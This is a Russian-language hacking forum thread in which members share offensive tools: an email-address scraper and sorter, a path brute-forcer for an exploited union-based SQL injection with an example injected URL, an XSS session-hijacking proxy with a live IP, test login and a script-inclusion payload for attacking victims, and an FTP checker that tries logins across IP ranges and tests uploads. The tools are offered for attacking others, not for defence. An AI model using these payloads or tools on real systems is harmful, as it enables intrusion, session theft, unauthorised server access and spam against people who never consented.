Программы для выполнения нужных рутинных действий автоматизации

Обсуждение в разделе «Инструменты», начал(-а) randman, 13.01.2013.

  1. randman

    randman Members of Antichat

    Регистрация:
    15.05.2010
    Сообщения:
    1 369
    Одобрения:
    602
    Репутация:
    663
    Тема тестовая. Различные парсеры/чекеры, использование которых другими людьми будет необходимо. Кроссплатформенное ПО с исходным кодом и свободной лицензией приветствуется :)
     
  2. vasykas

    vasykas Elder - Старейшина

    Регистрация:
    7.03.2011
    Сообщения:
    958
    Одобрения:
    131
    Репутация:
    24
    (Autoit)
    Сортирует Email
    удаляет дубликаты.( на выходе)
    Создает директорию \mail
    сортирует по файлам
    яндекс - yandex.txt и т.д
    пункт Автомат для распостраненных email:
    mail.ru
    yandex.ru
    gmail.com
    aol.com
    yahoo.com

    пункт Свой email для других сервисов email.(создает mail.txt)
    [​IMG]
    Ссылка

    Добавил *.html.
    Добавил модуль, теперь может вытаскивать мыло из 'мусора'.
     
    #2 vasykas, 13.01.2013
    В последний раз редактировалось: 22.01.2017
  3. vadakoff

    vadakoff New Member

    Регистрация:
    20.01.2011
    Сообщения:
    6
    Одобрения:
    1
    Репутация:
    0
    Перборщик путей/скриптов в раскрученной скуле

    Тулза ищет физические пути до скриптов на *nix серверах, работает с UnionBased.
    Принимет три параметра:

    1. (Обязателен) -u Передать в качестве значения урл вида
    http://www.vulnerhost.com/index.php?id=3+union+all+select+1,2,3,%POINT%,4,5--
    где "%POINT%" точка полезной нагрузки.
    Значение этого параметра рекомендуется обрамлять в двойные кавычки.

    2. (Опционально) -p Указывает кастомный префих путей, пример
    /пиздец/как/далеко/до/сервера
    в итоге будут сгенерированиы такие пути:
    /пиздец/как/далеко/до/сервера/public_html/index.php
    /пиздец/как/далеко/до/сервера/httpdocs/info.php
    /пиздец/как/далеко/до/сервера/index.html
    ...
    Если не указывать эту опцию, первым будет парсится /etc/passwd.

    3. (Опционально) -g Сгенерировать список путей и выйти без дальнейшего брута

    Во время брута если файл нашелся складывает результат в файл log.log, если нет
    то просто отображает "%" или "~" если произошла ошибка запроса.

    Запускать примерно так:
    c:\jruby-1.7.16.1\bin\jruby.exe bruteforce.rb
    но думаю что на не джава руби тоже покатит т.к. основные либы совместимы у них

    Писал на стадии изучения руби, поэтому за кривой код особо не ругать :).

    Ссылка
     
    Это одобряет ArmusIAm.
  4. psihoz26

    psihoz26 Members of Antichat

    Регистрация:
    22.11.2010
    Сообщения:
    552
    Одобрения:
    155
    Репутация:
    295
    XSS proxy написанный на php + js (супер сырая недопиленная бета)
    выкладываю так как пока нет времени на допиливание, насчет быдлокода не пинайте а лучше конструктивно критикуйте с рабочими исправлениями

    Из плюсов:
    Минимальные требование (apache + mod_rewrite + php + js)
    Весит очень мало
    Прост в использовании

    Что покачто недопиленно:
    Динамическая обфускация JS (шоб не палилось антивирусами как beef)
    Мультисессионность (начал пилить)
    Очередь запросов
    POST запросы с multipart-form-data
    Не тестирвоалась кроссбраузерность
    В админке у сессий не видно ссылки на которых находится жертва.

    Тестовая сборка:
    http://46.101.153.64/admin.php

    Как юзать?
    Втыкаем в своем браузере проксю 46.101.153.64:80 (логин и пароль test:test)
    Атакуем когонить с XSS пейлоадом <script src="http://46.101.153.64/xss.php"></script>
    обновляем admin.php пока в нем не появится сессия, далее пытаемся открыть сайт на котором находится жертва.


    Сорцы зааплоажу когда заработает аплоад файлов(
     
    #4 psihoz26, 22.04.2016
    В последний раз редактировалось: 22.04.2016
    Это одобряет st55.
  5. t0ma5

    t0ma5 Level 8

    Регистрация:
    10.02.2012
    Сообщения:
    614
    Одобрения:
    428
    Репутация:
    53
    интересно было бы поюзать :)
    апните плиз когда допилите
    сейчас в админке ошибки валятся
     
  6. psihoz26

    psihoz26 Members of Antichat

    Регистрация:
    22.11.2010
    Сообщения:
    552
    Одобрения:
    155
    Репутация:
    295
    пришли текст ошибки плз
     
  7. Best-Man

    Best-Man New Member

    Регистрация:
    22.01.2017
    Сообщения:
    3
    Одобрения:
    0
    Репутация:
    0
    Перезалейте файл. Удалили.
     
  8. vasykas

    vasykas Elder - Старейшина

    Регистрация:
    7.03.2011
    Сообщения:
    958
    Одобрения:
    131
    Репутация:
    24
  9. vasykas

    vasykas Elder - Старейшина

    Регистрация:
    7.03.2011
    Сообщения:
    958
    Одобрения:
    131
    Репутация:
    24
    Переделал программку.
    Чекает ФТП:
    по диапазону ip (xx.xx.xx.xx-xx.xx.xx.xx)
    или берем готовые
    ip из файла.
    Логин пароль
    можно выбрать свои.

    [​IMG]
    Добавил проверку заливки файла.
    Добавляем:
    из списка теста
    или
    из файла



    ошибки вроде исправил.
    Замечания, предложения учту.

    Ссылка.
     
    #9 vasykas, 29.03.2017
    В последний раз редактировалось: 6.04.2017
    Это одобряет sha9.
  10. sha9

    sha9 Member

    Регистрация:
    25.09.2015
    Сообщения:
    484
    Одобрения:
    546
    Репутация:
    1
    скачал програмку из любопытства. на первый взгляд - понравилась. но нельзя-ли немного уточнить некоторый вопросы?
    1.как я понял, auth говорит о том, что авторизация прошла успешно?
    2.не совсем понятно во вкладке test upload пункт фтп спискок->вставить. пытался вставлять различными способами и ничего не происходит. список из фтп скана не вставляется в данный пункт?не могли-бы разъяснить основные принципы работы с программой или дать ссылку на ранние пояснения? по поиску не нашел.
    3.если вы будете дорабатывать программу, нельзя-ли сделать расширяемый интерфейс? а то на нетбуке, к примеру не совсем удобно. окно не сжимается и не удобно немного пользоваться ею...
     
  11. vasykas

    vasykas Elder - Старейшина

    Регистрация:
    7.03.2011
    Сообщения:
    958
    Одобрения:
    131
    Репутация:
    24
    auth - если пара логин/пароль установленные в программе не подходят.
    Good - Удачная авторизация.
    Во вкладке test upload пункт фтп спискок и из файла выводится количество Good внизу в статус баре Всего:.(на экран выводятся только удачные заливки и пути)
    В ближайшее время доработаю
     
  12. sha9

    sha9 Member

    Регистрация:
    25.09.2015
    Сообщения:
    484
    Одобрения:
    546
    Репутация:
    1
    во-блин...а я-то думал,что тема умерла,а автор забросил проект... чисто случайно зашел. теперь буду почаще наведываться...
    спасибо за ответ. программа действительно понравилась. главное - не пропустить обновление,если вы еще ее не забросили.
    вопрос-не планируете включить в программу пробивку по эксплойтам,кроме простого брута по паролям?
    и еще один вопрос - новая версия программы еще не вышла?
     
    #12 sha9, 3.08.2017
    В последний раз редактировалось: 10.08.2017
  13. vasykas

    vasykas Elder - Старейшина

    Регистрация:
    7.03.2011
    Сообщения:
    958
    Одобрения:
    131
    Репутация:
    24
    Да не. проще отдельно написать.(тут брута нет просто вход по дефолту или какие введешь.)
     
    Это одобряет sha9.
Загрузка...